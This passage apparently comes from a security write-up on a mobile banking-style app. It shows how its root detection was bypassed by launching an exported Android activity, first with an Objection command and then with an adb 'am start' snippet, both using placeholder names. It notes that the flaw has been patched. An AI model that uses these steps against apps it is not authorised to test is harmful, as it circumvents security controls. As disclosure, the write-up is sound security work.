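    android:name=".BypassableActivity"
    android:exported="true" />
```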
We then started the mobile application and executed the following Objection command to launch the exported activity, in an attempt to bypass the root detection screen:

android intent launch_activity <ACTIVITY_NAME>

The figure below shows the command being executed successfully:

The figure below demonstrates the successful bypass. We were able to use the application without any issues related to root detection.
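For completeness, an exported activity like this can typically also be launched without Objection, using adb's activity manager; the component name below is a placeholder, not the real one:

```shell
# Hypothetical component name; substitute the exported activity found
# in AndroidManifest.xml
COMPONENT="com.example.bank/.ExportedActivity"

# Launch the exported activity directly (runs only if adb is available)
if command -v adb >/dev/null 2>&1; then
  adb shell am start -n "$COMPONENT"
fi
```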

Note: This write-up is being published a couple of months after the discovery. The application is no longer active and requires an update. Additionally, the vulnerability has been patched by the application developers.